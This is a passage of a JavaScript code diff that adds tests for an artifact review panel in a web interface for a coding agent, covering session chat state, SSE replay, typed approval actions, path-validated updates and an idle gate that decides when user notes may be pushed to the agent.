+  // gate must not act on a stale idle_at_prompt (an intervening turn could have
+  // started). The bounded tail read is cheap and only runs on a human-paced push.
+  async _artifactTurnState(binding) {
+    if (!binding || !binding.file) return { state: 'unknown' };
+    try {
+      return (await detectTurnState(binding.file)) || { state: 'unknown' };
+    } catch (_) {
+      return { state: 'unknown' };
     }
   }
 

--- a/test/artifact-panel.test.js
+++ b/test/artifact-panel.test.js
@@ -260,7 +260,8 @@ describe('artifact-panel.js (DOM: iframe + SSE + postMessage bridge)', function 
     panel.open({ sessionId: 'sid-1', viewUrl: 'x' });
     panel._setPresence('working');
     assert.equal(panel._presence, 'working');
-    panel.agentReply({ sessionId: 'sid-1', text: 'on it' });
+    // Agent replies now arrive ONLY via SSE (C-P0-1); no WS agentReply method.
+    sseInstances[0].emit('agent-reply', JSON.stringify({ id: '1', text: 'on it' }));
     assert.equal(panel._presence, 'listening', 'agent reply clears working');
   });
 
@@ -431,6 +432,183 @@ describe('artifact-panel.js (DOM: iframe + SSE + postMessage bridge)', function 
     assert.equal(panel._iframe.src, before);
     panel.reloadReview({ sessionId: 'sid-1' }); // active: cache-busted
     assert.ok(panel._iframe.src.includes('_r='), 'iframe src should be cache-busted');
+  });
+
+  describe('v2 P0: per-session state, dismiss/re-open, SSE id-dedupe, note recovery', function () {
+    function queueAnnotation(panel, sessionId, prompt) {
+      window.dispatchEvent(new window.MessageEvent('message', {
+        source: panel._iframe.contentWindow,
+        data: { source: 'ai-or-die-artifact-sdk', type: 'artifact-annotation-queued', sessionId, payload: { annotation: { prompt, selector: 'p' } } },
+      }));
+    }
+
+    it('C-P0-2: switching tabs preserves each session\'s queued pills (no drop)', async function () {
+      const panel = new ArtifactPanel(app);
+      panel.notifyActiveSessionChanged('sid-1');
+      panel.open({ sessionId: 'sid-1', viewUrl: 'x' });
+      queueAnnotation(panel, 'sid-1', 'fix sid-1');
+      await Promise.resolve();
+      assert.equal(document.querySelectorAll('#artifactPills .artifact-panel__pill').length, 1);
+
+      // Switch away and back — the pill must survive (was cleared before P0).
+      panel.open({ sessionId: 'sid-2', viewUrl: 'x' });
+      panel.notifyActiveSessionChanged('sid-2');
+      assert.equal(document.querySelectorAll('#artifactPills .artifact-panel__pill').length, 0, 'sid-2 has its own empty queue');
+      panel.notifyActiveSessionChanged('sid-1');
+      assert.equal(document.querySelectorAll('#artifactPills .artifact-panel__pill').length, 1, 'sid-1 queue restored');
+      assert.ok(document.getElementById('artifactPills').textContent.includes('fix sid-1'));
+    });
+
+    it('C-P0-2: switching tabs preserves chat history (no wipe)', function () {
+      const panel = new ArtifactPanel(app);
+      panel.notifyActiveSessionChanged('sid-1');
+      panel.open({ sessionId: 'sid-1', viewUrl: 'x' });
+      sseInstances[0].emit('agent-reply', JSON.stringify({ id: '1', text: 'reply-A' }));
+      assert.ok(document.getElementById('artifactChat').textContent.includes('reply-A'));
+
+      panel.open({ sessionId: 'sid-2', viewUrl: 'x' });
+      panel.notifyActiveSessionChanged('sid-2');
+      assert.ok(!document.getElementById('artifactChat').textContent.includes('reply-A'), 'sid-2 chat is its own');
+      panel.notifyActiveSessionChanged('sid-1');
+      assert.ok(document.getElementById('artifactChat').textContent.includes('reply-A'), 'sid-1 chat restored on return');
+    });
+
+    it('C-P0-1/4: an SSE agent-reply with a repeated id renders only once', function () {
+      const panel = new ArtifactPanel(app);
+      panel.notifyActiveSessionChanged('sid-1');
+      panel.open({ sessionId: 'sid-1', viewUrl: 'x' });
+      sseInstances[0].emit('agent-reply', JSON.stringify({ id: '5', text: 'once only' }));
+      // Native EventSource replay after a reconnect can resend the same id.
+      sseInstances[0].emit('agent-reply', JSON.stringify({ id: '5', text: 'once only' }));
+      const occurrences = document.getElementById('artifactChat').textContent.split('once only').length - 1;
+      assert.equal(occurrences, 1, 'duplicate id rendered exactly once');
+    });
+
+    it('C-P0-3: × dismiss POSTs /dismiss, hides, and shows a re-open badge; re-open restores', function () {
+      const panel = new ArtifactPanel(app);
+      panel.notifyActiveSessionChanged('sid-1');
+      panel.open({ sessionId: 'sid-1', viewUrl: 'x' });
+      assert.equal(panel.el.hidden, false);
+
+      panel.collapse(); // the × button
+      assert.equal(panel.el.hidden, true, 'panel hidden on dismiss');
+      assert.equal(panel._reopenBadge.hidden, false, 're-open badge shown');
+      const dismiss = posted.find((p) => String(p.url).includes('/dismiss'));
+      assert.ok(dismiss, 'POSTed /dismiss');
+      assert.equal(JSON.parse(dismiss.opts.body).dismissed, true);
+
+      panel.expand(); // the badge
+      assert.equal(panel.el.hidden, false, 'panel reshown on re-open');
+      assert.equal(panel._reopenBadge.hidden, true, 'badge hidden after re-open');
+      const undismiss = posted.filter((p) => String(p.url).includes('/dismiss'));
+      assert.equal(JSON.parse(undismiss[undismiss.length - 1].opts.body).dismissed, false, 're-open sends dismissed:false');
+    });
+
+    it('C-P0-3: chat survives a dismiss -> re-open cycle', function () {
+      const panel = new ArtifactPanel(app);
+      panel.notifyActiveSessionChanged('sid-1');
+      panel.open({ sessionId: 'sid-1', viewUrl: 'x' });
+      sseInstances[0].emit('agent-reply', JSON.stringify({ id: '1', text: 'keep me' }));
+      panel.collapse();
+      panel.expand();
+      assert.ok(document.getElementById('artifactChat').textContent.includes('keep me'), 'chat intact after re-open');
+    });
+
+    it('C-P0-7: a failed note is restored to the composer for retry', async function () {
+      const panel = new ArtifactPanel(app);
+      panel.notifyActiveSessionChanged('sid-1');
+      panel.open({ sessionId: 'sid-1', viewUrl: 'x' });
+      const failFetch = (url, opts) => { posted.push({ url, opts }); return Promise.resolve({ ok: false, status: 500, json: () => Promise.resolve({}) }); };
+      global.fetch = failFetch; global.window.fetch = failFetch;
+
+      document.getElementById('artifactInput').value = 'note that fails';
+      panel._submitNote();
+      await new Promise((r) => setTimeout(r, 0));
+      await new Promise((r) => setTimeout(r, 0));
+      assert.equal(document.getElementById('artifactInput').value, 'note that fails', 'note restored to composer');
+      assert.ok(document.getElementById('artifactChat').textContent.includes('restored'), 'a retry notice is shown');
+    });
+
+    it('C-P0-4: _loadHistory rehydrates chat on a first empty render', async function () {
+      const histFetch = (url, opts) => {
+        posted.push({ url, opts });
+        if (String(url).includes('/history')) {
+          return Promise.resolve({ ok: true, json: () => Promise.resolve({
+            chat: [{ id: '1', role: 'you', text: 'earlier note' }, { id: '2', role: 'agent', text: 'earlier reply' }],
+            events: [], status: 'open', cursor: '2', visibility: 'shown',
+          }) });
+        }
+        return Promise.resolve({ ok: true, json: () => Promise.resolve({ ok: true }) });
+      };
+      global.fetch = histFetch; global.window.fetch = histFetch;
+
+      const panel = new ArtifactPanel(app);
+      panel.notifyActiveSessionChanged('sid-1');
+      panel.open({ sessionId: 'sid-1', viewUrl: 'x' }); // _show -> _loadHistory
+      await new Promise((r) => setTimeout(r, 0));
+      await new Promise((r) => setTimeout(r, 0));
+      const chat = document.getElementById('artifactChat').textContent;
+      assert.ok(chat.includes('earlier note') && chat.includes('earlier reply'), 'history repainted');
+      // The cursor advanced past the agent reply so a later SSE frame for id 2 is ignored.
+      sseInstances[0].emit('agent-reply', JSON.stringify({ id: '2', text: 'earlier reply' }));
+      const occurrences = document.getElementById('artifactChat').textContent.split('earlier reply').length - 1;
+      assert.equal(occurrences, 1, 'history+SSE do not double-render the same id');
+    });
+
+    it('C-P1-3: an artifact-action forwards to /actions and reflects plan-state to the iframe', async function () {
+      const panel = new ArtifactPanel(app);
+      panel.notifyActiveSessionChanged('sid-1');
+      panel.open({ sessionId: 'sid-1', viewUrl: 'x' });
+      const planStates = [];
+      const origPost = panel._postToIframe.bind(panel);
+      panel._postToIframe = (type, pl) => { if (type === 'plan-state') planStates.push(pl); return origPost(type, pl); };
+
+      window.dispatchEvent(new window.MessageEvent('message', {
+        source: panel._iframe.contentWindow,
+        data: {
+          source: 'ai-or-die-artifact-sdk', type: 'artifact-action', sessionId: 'sid-1',
+          payload: { action: 'approve', elementId: 'plan-step-3', context: { selector: 'li', sourceLine: 42 } },
+        },
+      }));
+      await Promise.resolve();
+
+      const call = posted.find((p) => String(p.url).includes('/actions'));
+      assert.ok(call, 'POSTed to /actions');
+      const body = JSON.parse(call.opts.body);
+      assert.equal(body.actions[0].action, 'approve');
+      assert.equal(body.actions[0].elementId, 'plan-step-3');
+      assert.equal(body.actions[0].sourceLine, 42);
+      assert.ok(planStates.length >= 1, 'plan-state reflected to the iframe');
+      assert.deepEqual(planStates[0].steps[0], { elementId: 'plan-step-3', state: 'approved' });
+      assert.ok(document.getElementById('artifactChat').textContent.includes('approve: plan-step-3'));
+    });
+
+    it('C-P1-3: a multi-select submit action reflects each selected member as done', async function () {
+      const panel = new ArtifactPanel(app);
+      panel.notifyActiveSessionChanged('sid-1');
+      panel.open({ sessionId: 'sid-1', viewUrl: 'x' });
+      const planStates = [];
+      const origPost = panel._postToIframe.bind(panel);
+      panel._postToIframe = (type, pl) => { if (type === 'plan-state') planStates.push(pl); return origPost(type, pl); };
+
+      window.dispatchEvent(new window.MessageEvent('message', {
+        source: panel._iframe.contentWindow,
+        data: {
+          source: 'ai-or-die-artifact-sdk', type: 'artifact-action', sessionId: 'sid-1',
+          payload: { action: 'submit', elementId: 'tasks-go', group: 'tasks', selected: [{ elementId: 'task-7', value: 'retry' }] },
+        },
+      }));
+      await Promise.resolve();
+
+      const call = posted.find((p) => String(p.url).includes('/actions'));
+      assert.ok(call);
+      const body = JSON.parse(call.opts.body);
+      assert.equal(body.actions[0].action, 'submit');
+      assert.deepEqual(body.actions[0].selected, [{ elementId: 'task-7', value: 'retry' }]);
+      const states = planStates[0].steps.reduce((m, s) => { m[s.elementId] = s.state; return m; }, {});
+      assert.equal(states['task-7'], 'done');
+      assert.equal(states['tasks-go'], 'done');
+    });
   });
 
   describe('floating-window chrome', function () {

--- a/test/artifact-sdk-client.test.js
+++ b/test/artifact-sdk-client.test.js
@@ -125,6 +125,78 @@ describe('artifact-sdk-client.js (annotation payload shape)', function () {
     assert.ok(!card, 'no card opened for a native control click');
   });
 
+  it('C-P1-2: a data-aod choose control emits ONE structured action, not an annotation', function () {
+    const btn = win.document.createElement('button');
+    btn.setAttribute('data-aod-action', 'choose');
+    btn.setAttribute('data-aod-id', 'decision-1');
+    btn.setAttribute('data-aod-value', 'option-b');
+    btn.textContent = 'Option B';
+    win.document.body.appendChild(btn);
+    posted.length = 0;
+    btn.dispatchEvent(new win.MouseEvent('click', { bubbles: true, cancelable: true }));
+    const acts = posted.filter((m) => m && m.type === 'artifact-action');
+    assert.equal(acts.length, 1, 'one action emitted');
+    assert.equal(acts[0].payload.action, 'choose');
+    assert.equal(acts[0].payload.elementId, 'decision-1');
+    assert.equal(acts[0].payload.value, 'option-b');
+    assert.equal(posted.filter((m) => m && m.type === 'artifact-annotation-queued').length, 0, 'no annotation queued');
+  });
+
+  it('C-P1-2: check toggles are UI-local; a submit harvests the checked group set once', function () {
+    const mkCheck = (id, val) => {
+      const c = win.document.createElement('input');
+      c.type = 'checkbox';
+      c.setAttribute('data-aod-action', 'check');
+      c.setAttribute('data-aod-group', 'tasks');
+      c.setAttribute('data-aod-id', id);
+      c.setAttribute('data-aod-value', val);
+      win.document.body.appendChild(c);
+      return c;
+    };
+    const c1 = mkCheck('task-7', 'retry');
+    mkCheck('task-9', 'cache'); // left unchecked
+    const submit = win.document.createElement('button');
+    submit.setAttribute('data-aod-action', 'submit');
+    submit.setAttribute('data-aod-group', 'tasks');
+    submit.setAttribute('data-aod-id', 'tasks-go');
+    win.document.body.appendChild(submit);
+
+    posted.length = 0;
+    c1.checked = true;
+    c1.dispatchEvent(new win.Event('change', { bubbles: true }));
+    assert.equal(posted.filter((m) => m && m.type === 'artifact-action').length, 0, 'a check change emits nothing');
+
+    submit.dispatchEvent(new win.MouseEvent('click', { bubbles: true, cancelable: true }));
+    const acts = posted.filter((m) => m && m.type === 'artifact-action');
+    assert.equal(acts.length, 1, 'submit emits exactly one action');
+    assert.equal(acts[0].payload.action, 'submit');
+    assert.equal(acts[0].payload.group, 'tasks');
+    assert.deepEqual(acts[0].payload.selected, [{ elementId: 'task-7', value: 'retry' }]);
+  });
+
+  it('C-P1-2: a data-aod control missing data-aod-id is ignored', function () {
+    const btn = win.document.createElement('button');
+    btn.setAttribute('data-aod-action', 'approve'); // no data-aod-id
+    win.document.body.appendChild(btn);
+    posted.length = 0;
+    btn.dispatchEvent(new win.MouseEvent('click', { bubbles: true, cancelable: true }));
+    assert.equal(posted.filter((m) => m && m.type === 'artifact-action').length, 0, 'ignored without an id');
+  });
+
+  it('C-P1-2: an inbound plan-state marks matching data-aod-id elements with data-aod-state', function () {
+    const li = win.document.createElement('li');
+    li.setAttribute('data-aod-id', 'plan-step-3');
+    win.document.body.appendChild(li);
+    win.postMessage = win.postMessage; // no-op (kept intercepted)
+    // Deliver a host plan-state message (source must be the parent window).
+    const evt = new win.MessageEvent('message', {
+      data: { source: 'ai-or-die-artifact-host', type: 'plan-state', sessionId: 'sid-9', payload: { steps: [{ elementId: 'plan-step-3', state: 'approved' }] } },
+    });
+    Object.defineProperty(evt, 'source', { value: win });
+    win.dispatchEvent(evt);
+    assert.equal(li.getAttribute('data-aod-state'), 'approved');
+  });
+
   it('a text selection yields a text-range target annotation', function () {
     const para = win.document.getElementById('para');
     const sel = win.document.getSelection();

--- a/test/control/artifact-routes.test.js
+++ b/test/control/artifact-routes.test.js
@@ -105,6 +105,7 @@ function buildApp(opts) {
     sseHeartbeatMs: opts.sseHeartbeatMs == null ? 50 : opts.sseHeartbeatMs,
     pushToAgent: opts.pushToAgent || null,
     pushTimeoutMs: opts.pushTimeoutMs,
+    routeApprovalAction: opts.routeApprovalAction || null,
   }));
   app.use((err, req, res, next) => { // eslint-disable-line no-unused-vars
     res.status(500).json({ error: err.message });
@@ -462,5 +463,328 @@ describe('artifact review routes', function () {
         server.close();
       }
     });
+  });
+
+  describe('v2 P0: dismiss / history / typed await / SSE replay', function () {
+    it('POST /dismiss toggles server-authoritative visibility, reflected in /history', async function () {
+      const { app } = buildApp({ baseDir: tmpDir });
+      const { server, port } = await listen(app);
+      try {
+        await postJson(port, '/api/artifact/s1/open', { file: artifactFile });
+        let hist = await getJson(port, '/api/artifact/s1/history');
+        assert.equal(hist.body.visibility, 'shown');
+
+        const d = await postJson(port, '/api/artifact/s1/dismiss', {});
+        assert.equal(d.body.visibility, 'dismissed');
+        hist = await getJson(port, '/api/artifact/s1/history');
+        assert.equal(hist.body.visibility, 'dismissed');
+
+        const u = await postJson(port, '/api/artifact/s1/dismiss', { dismissed: false });
+        assert.equal(u.body.visibility, 'shown');
+        hist = await getJson(port, '/api/artifact/s1/history');
+        assert.equal(hist.body.visibility, 'shown');
+      } finally {
+        server.close();
+      }
+    });
+
+    it('GET /history returns derived chat (you + agent) with ids and a cursor', async function () {
+      const { app } = buildApp({ baseDir: tmpDir });
+      const { server, port } = await listen(app);
+      try {
+        await postJson(port, '/api/artifact/s1/open', { file: artifactFile });
+        await postJson(port, '/api/artifact/s1/prompts', { prompts: ['human note'] });
+        await postJson(port, '/api/artifact/s1/agent-reply', { text: 'agent answer' });
+
+        const hist = await getJson(port, '/api/artifact/s1/history');
+        assert.equal(hist.status, 200);
+        const roles = hist.body.chat.map((c) => c.role + ':' + c.text);
+        assert.ok(roles.includes('you:human note'), 'human note in chat');
+        assert.ok(roles.includes('agent:agent answer'), 'agent reply in chat');
+        assert.ok(hist.body.chat.every((c) => c.id), 'every chat entry has an id');
+        assert.equal(hist.body.cursor, '2', 'cursor is the high-water event id');
+        assert.equal(hist.body.status, 'open');
+      } finally {
+        server.close();
+      }
+    });
+
+    it('GET /await returns typed comment events with ids; a later cursor drains empty', async function () {
+      const { app } = buildApp({ baseDir: tmpDir, pollHoldMs: 60 });
+      const { server, port } = await listen(app);
+      try {
+        await postJson(port, '/api/artifact/s1/open', { file: artifactFile });
+        await postJson(port, '/api/artifact/s1/prompts', {
+          prompts: [{ prompt: 'tighten the plan', text: 'goal', sourceLine: 3 }],
+        });
+
+        const first = await getJson(port, '/api/artifact/s1/await?cursor=0');
+        assert.equal(first.status, 200);
+        assert.equal(first.body.events.length, 1);
+        assert.equal(first.body.events[0].kind, 'comment');
+        assert.equal(first.body.events[0].prompt, 'tighten the plan');
+        assert.equal(first.body.events[0].sourceLine, 3);
+        assert.ok(first.body.events[0].id, 'event carries an id');
+        const cursor = first.body.cursor;
+
+        // Draining again from the returned cursor yields nothing (single-delivery),
+        // and the long-hold times out with an empty typed payload.
+        const second = await getJson(port, `/api/artifact/s1/await?cursor=${cursor}`);
+        assert.deepEqual(second.body.events, []);
+        assert.equal(second.body.status, 'open');
+      } finally {
+        server.close();
+      }
+    });
+
+    it('GET /await long-holds then resolves when a prompt arrives (with ended terminal)', async function () {
+      const { app } = buildApp({ baseDir: tmpDir, pollHoldMs: 500, pollHeartbeatMs: 20 });
+      const { server, port } = await listen(app);
+      try {
+        await postJson(port, '/api/artifact/s1/open', { file: artifactFile });
+        const pending = getJson(port, '/api/artifact/s1/await?cursor=0');
+        await new Promise((r) => setTimeout(r, 40));
+        await postJson(port, '/api/artifact/s1/prompts', { prompts: ['wake the drain'] });
+        const out = await pending;
+        assert.equal(out.body.events.length, 1);
+        assert.equal(out.body.events[0].prompt, 'wake the drain');
+
+        // End emits a terminal ended event visible to a fresh await.
+        await postJson(port, '/api/artifact/s1/end', {});
+        const after = await getJson(port, `/api/artifact/s1/await?cursor=${out.body.cursor}`);
+        assert.ok(after.body.events.some((e) => e.kind === 'ended'), 'ended event delivered');
+        assert.equal(after.body.status, 'ended');
+      } finally {
+        server.close();
+      }
+    });
+
+    it('SSE frames carry event ids and Last-Event-ID replays exactly the gap', async function () {
+      const { app } = buildApp({ baseDir: tmpDir, sseHeartbeatMs: 1000 });
+      const { server, port } = await listen(app);
+      try {
+        await postJson(port, '/api/artifact/s1/open', { file: artifactFile });
+        // Two replies land while the browser is "disconnected".
+        await postJson(port, '/api/artifact/s1/agent-reply', { text: 'reply one' });
+        await postJson(port, '/api/artifact/s1/agent-reply', { text: 'reply two' });
+
+        // Reconnect with Last-Event-ID: 1 → only reply two (id 2) is replayed.
+        const frames = await collectSse(port, '/api/artifact/s1/events', { 'Last-Event-ID': '1' }, 150);
+        assert.ok(frames.includes('id: 2'), 'replays the id past the cursor');
+        assert.ok(frames.includes('reply two'), 'replays the missed reply');
+        assert.ok(!frames.includes('reply one'), 'does NOT replay an already-seen reply');
+      } finally {
+        server.close();
+      }
+    });
+  });
+
+  describe('v2 P1: typed actions, approval routing, update', function () {
+    it('POST /actions enqueues typed action events; /await returns the comment+action union once', async function () {
+      const { app } = buildApp({ baseDir: tmpDir, pollHoldMs: 60 });
+      const { server, port } = await listen(app);
+      try {
+        await postJson(port, '/api/artifact/s1/open', { file: artifactFile });
+        await postJson(port, '/api/artifact/s1/prompts', { prompts: ['a free-text note'] });
+        const r = await postJson(port, '/api/artifact/s1/actions', {
+          actions: [
+            { action: 'approve', elementId: 'plan-step-3' },
+            { action: 'submit', elementId: 'tasks-go', group: 'tasks', selected: [{ elementId: 'task-7', value: 'retry' }] },
+          ],
+        });
+        assert.equal(r.status, 200);
+        assert.equal(r.body.pushed, false, 'no approval routing hook wired → drains');
+        assert.equal(r.body.queued, 2);
+
+        const drain = await getJson(port, '/api/artifact/s1/await?cursor=0');
+        const kinds = drain.body.events.map((e) => e.kind);
+        assert.deepEqual(kinds, ['comment', 'action', 'action'], 'typed union in id order');
+        const submit = drain.body.events.find((e) => e.action === 'submit');
+        assert.equal(submit.group, 'tasks');
+        assert.deepEqual(submit.selected, [{ elementId: 'task-7', value: 'retry' }]);
+
+        // Single-delivery by cursor: a fresh drain from the high-water is empty.
+        const again = await getJson(port, `/api/artifact/s1/await?cursor=${drain.body.cursor}`);
+        assert.deepEqual(again.body.events, []);
+      } finally {
+        server.close();
+      }
+    });
+
+    it('legacy /poll projects comment feedback (back-compat) and NEVER returns actions', async function () {
+      const { app } = buildApp({ baseDir: tmpDir });
+      const { server, port } = await listen(app);
+      try {
+        await postJson(port, '/api/artifact/s1/open', { file: artifactFile });
+        await postJson(port, '/api/artifact/s1/prompts', { prompts: ['legacy note'] });
+        await postJson(port, '/api/artifact/s1/actions', { actions: [{ action: 'approve', elementId: 'x' }] });
+
+        const poll = await getJson(port, '/api/artifact/s1/poll');
+        assert.deepEqual(poll.body.prompts, ['legacy note'], 'comment lane visible to old /poll');
+        assert.ok(!('events' in poll.body), 'no typed events leak into the legacy shape');
+        assert.ok(JSON.stringify(poll.body).indexOf('approve') === -1, 'actions never appear in /poll');
+      } finally {
+        server.close();
+      }
+    });
+
+    it('approval-verb actions route via routeApprovalAction and are NOT queued when handled', async function () {
+      const calls = [];
+      const routeApprovalAction = async (sessionId, action) => { calls.push({ sessionId, action }); return action.action === 'approve'; };
+      const { app } = buildApp({ baseDir: tmpDir, routeApprovalAction, pollHoldMs: 60 });
+      const { server, port } = await listen(app);
+      try {
+        await postJson(port, '/api/artifact/s1/open', { file: artifactFile });
+        const r = await postJson(port, '/api/artifact/s1/actions', {
+          actions: [
+            { action: 'approve', elementId: 'p1' }, // handled → routed, not queued
+            { action: 'submit', elementId: 'g', group: 'tasks', selected: [] }, // non-approval → queued
+          ],
+        });
+        assert.equal(r.body.pushed, true, 'at least one action was routed');
+        assert.equal(r.body.queued, 1, 'only the non-routed action is queued');
+        assert.equal(calls.length, 1, 'route hook consulted only for the approval verb');
+
+        const drain = await getJson(port, '/api/artifact/s1/await?cursor=0');
+        assert.equal(drain.body.events.length, 1);
+        assert.equal(drain.body.events[0].action, 'submit', 'routed approval is absent from the drain');
+      } finally {
+        server.close();
+      }
+    });
+
+    it('POST /update {file} re-reads via validatePath and reloads', async function () {
+      const other = path.join(tmpDir, 'other.html');
+      fs.writeFileSync(other, '<!doctype html><html><body><h2>Updated</h2></body></html>');
+      const { app } = buildApp({ baseDir: tmpDir });
+      const { server, port } = await listen(app);
+      try {
+        await postJson(port, '/api/artifact/s1/open', { file: artifactFile });
+        const r = await postJson(port, '/api/artifact/s1/update', { file: other });
+        assert.equal(r.status, 200);
+        assert.equal(r.body.ok, true);
+        const view = await fetch(`http://127.0.0.1:${port}/api/artifact/s1/view`);
+        const html = await view.text();
+        assert.match(html, /Updated/, 'view now serves the updated file');
+      } finally {
+        server.close();
+      }
+    });
+
+    it('POST /update {html} writes to the sandboxed review file and reloads', async function () {
+      const { app } = buildApp({ baseDir: tmpDir });
+      const { server, port } = await listen(app);
+      try {
+        await postJson(port, '/api/artifact/s1/open', { file: artifactFile });
+        const r = await postJson(port, '/api/artifact/s1/update', { html: '<!doctype html><html><body><h3>Inline HTML</h3></body></html>' });
+        assert.equal(r.status, 200);
+        // Written to the review's sandboxed file on disk (not an unsandboxed blob).
+        assert.match(fs.readFileSync(artifactFile, 'utf8'), /Inline HTML/);
+        const view = await fetch(`http://127.0.0.1:${port}/api/artifact/s1/view`);
+        assert.match(await view.text(), /Inline HTML/);
+      } finally {
+        server.close();
+      }
+    });
+
+    it('POST /update returns tagged-400 INVALID_REQUEST for both / neither / out-of-base', async function () {
+      const outsideDir = fs.mkdtempSync(path.join(os.tmpdir(), 'artifact-update-outside-'));
+      const outsideFile = path.join(outsideDir, 'evil.html');
+      fs.writeFileSync(outsideFile, '<html></html>');
+      const { app } = buildApp({ baseDir: tmpDir });
+      const { server, port } = await listen(app);
+      try {
+        await postJson(port, '/api/artifact/s1/open', { file: artifactFile });
+
+        const both = await postJson(port, '/api/artifact/s1/update', { file: artifactFile, html: '<html></html>' });
+        assert.equal(both.status, 400);
+        assert.equal(both.body.error.code, 'INVALID_REQUEST');
+
+        const neither = await postJson(port, '/api/artifact/s1/update', {});
+        assert.equal(neither.status, 400);
+        assert.equal(neither.body.error.code, 'INVALID_REQUEST');
+
+        const outOfBase = await postJson(port, '/api/artifact/s1/update', { file: outsideFile });
+        assert.equal(outOfBase.status, 400);
+        assert.equal(outOfBase.body.error.code, 'INVALID_REQUEST');
+      } finally {
+        server.close();
+        fs.rmSync(outsideDir, { recursive: true, force: true });
+      }
+    });
+  });
+});
+
+// Collect raw SSE bytes from an endpoint for `ms`, then abort. Used to assert the
+// id: frames + Last-Event-ID replay without a browser EventSource.
+function collectSse(port, pathname, headers, ms) {
+  return new Promise((resolve) => {
+    const req = http.get({ host: '127.0.0.1', port, path: pathname, headers }, (res) => {
+      let buf = '';
+      res.on('data', (c) => { buf += c.toString(); });
+      setTimeout(() => { try { req.destroy(); } catch (_) { /* ignore */ } resolve(buf); }, ms);
+    });
+    req.on('error', () => resolve(''));
+  });
+}
+
+// Focused wiring test for the hardened idle gate (C-P0-6): the transcript
+// turn-state is the PRIMARY gate. Exercises the real _pushArtifactFeedbackToAgent
+// with stubbed bridge/turn-state so no PTY or JSONL file is needed.
+describe('artifact push idle gate (C-P0-6, transcript-primary)', function () {
+  if (!ClaudeCodeWebServer) {
+    it('skipped — server module unavailable', function () { this.skip(); });
+    return;
+  }
+  const push = ClaudeCodeWebServer.prototype._pushArtifactFeedbackToAgent;
+
+  function fakeServer(opts) {
+    const wrote = [];
+    const self = {
+      _artifactPushQuietMs: 1500,
+      _bridgeForSession: () => (opts.bridge === null ? null : { msSinceLastOutput: () => opts.quietMs }),
+      _stickyJsonl: new Map(opts.binding ? [['s1', { file: 'x.jsonl' }]] : []),
+      _artifactTurnState: async () => ({ state: opts.state }),
+      _writeArtifactPush: ClaudeCodeWebServer.prototype._writeArtifactPush,
+    };
+    // Stub the low-level write so we observe intent without a PTY.
+    self._writeArtifactPush = async (_b, _sid, text) => { wrote.push(text); return true; };
+    return { self, wrote };
+  }
+
+  it('DECLINES a free-text push when a user-facing tool is pending (awaiting_input)', async function () {
+    const { self, wrote } = fakeServer({ binding: true, state: 'awaiting_input', quietMs: 9999 });
+    assert.equal(await push.call(self, 's1', 'note'), false);
+    assert.equal(wrote.length, 0, 'never inject into a live menu even when PTY is quiet');
+  });
+
+  it('DECLINES while the agent is mid-tool (working)', async function () {
+    const { self, wrote } = fakeServer({ binding: true, state: 'working', quietMs: 9999 });
+    assert.equal(await push.call(self, 's1', 'note'), false);
+    assert.equal(wrote.length, 0);
+  });
+
+  it('DECLINES on a bound-but-unknown transcript (no unsafe PTY-quiet fallback when bound)', async function () {
+    const { self, wrote } = fakeServer({ binding: true, state: 'unknown', quietMs: 9999 });
+    assert.equal(await push.call(self, 's1', 'note'), false, 'a bound session reading unknown must not inject');
+    assert.equal(wrote.length, 0);
+  });
+
+  it('INJECTS when the transcript shows idle_at_prompt', async function () {
+    const { self, wrote } = fakeServer({ binding: true, state: 'idle_at_prompt', quietMs: 0 });
+    assert.equal(await push.call(self, 's1', 'note'), true);
+    assert.deepEqual(wrote, ['note']);
+  });
+
+  it('with NO binding, falls back to PTY-quiet: injects when quiet, declines when noisy', async function () {
+    const quiet = fakeServer({ binding: false, state: 'unknown', quietMs: 2000 });
+    assert.equal(await push.call(quiet.self, 's1', 'note'), true, 'quiet PTY → inject (fallback)');
+    const noisy = fakeServer({ binding: false, state: 'unknown', quietMs: 500 });
+    assert.equal(await push.call(noisy.self, 's1', 'note'), false, 'noisy PTY → decline (fallback)');
+  });
+
+  it('returns false when there is no live bridge for the session', async function () {
+    const { self } = fakeServer({ bridge: null, binding: true, state: 'idle_at_prompt', quietMs: 0 });
+    assert.equal(await push.call(self, 's1', 'note'), false);
   });
 });

--- a/test/control/jsonl-awaiting.test.js
+++ b/test/control/jsonl-awaiting.test.js
@@ -4,7 +4,7 @@ const assert = require('assert');
 const fs = require('fs');
 const os = require('os');
 const path = require('path');
-const { detectAwaiting } = require('../../src/control/jsonl-awaiting');
+const { detectAwaiting, detectTurnState } = require('../../src/control/jsonl-awaiting');
 
 function tmpFile(contents) {
   const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'aiod-jsonl-awaiting-'));
@@ -85,5 +85,54 @@ describe('control/jsonl-awaiting detectAwaiting', function () {
     }));
 
     assert.equal(await detectAwaiting(file), null);
+  });
+});
+
+describe('control/jsonl-awaiting detectTurnState (artifact idle gate)', function () {
+  it('awaiting_input when a user-facing tool is pending (never push free text)', async function () {
+    const file = tmpFile(line({
+      type: 'assistant',
+      message: { content: [{ type: 'tool_use', id: 'toolu_a', name: 'ExitPlanMode', input: { plan: 'P' } }] },
+    }));
+    const turn = await detectTurnState(file);
+    assert.equal(turn.state, 'awaiting_input');
+    assert.equal(turn.pendingUserFacingTool, 'ExitPlanMode');
+  });
+
+  it('idle_at_prompt when the last assistant turn is a completed text turn', async function () {
+    const file = tmpFile(line({
+      type: 'assistant',
+      message: { content: [{ type: 'text', text: 'All done.' }] },
+    }));
+    assert.equal((await detectTurnState(file)).state, 'idle_at_prompt');
+  });
+
+  it('working when the last assistant has an unresolved (non-user-facing) tool_use', async function () {
+    const file = tmpFile(line({
+      type: 'assistant',
+      message: { content: [{ type: 'tool_use', id: 'toolu_b', name: 'Bash', input: { command: 'ls' } }] },
+    }));
+    assert.equal((await detectTurnState(file)).state, 'working');
+  });
+
+  it('working when a trailing tool_result is queued for the agent to continue', async function () {
+    const file = tmpFile(
+      line({ type: 'assistant', message: { content: [{ type: 'tool_use', id: 'toolu_c', name: 'Bash', input: {} }] } }) +
+      line({ type: 'user', message: { content: [{ type: 'tool_result', tool_use_id: 'toolu_c', content: 'ok' }] } })
+    );
+    assert.equal((await detectTurnState(file)).state, 'working');
+  });
+
+  it('idle_at_prompt after a tool_use is resolved AND the assistant speaks again', async function () {
+    const file = tmpFile(
+      line({ type: 'assistant', message: { content: [{ type: 'tool_use', id: 'toolu_d', name: 'Bash', input: {} }] } }) +
+      line({ type: 'user', message: { content: [{ type: 'tool_result', tool_use_id: 'toolu_d', content: 'ok' }] } }) +
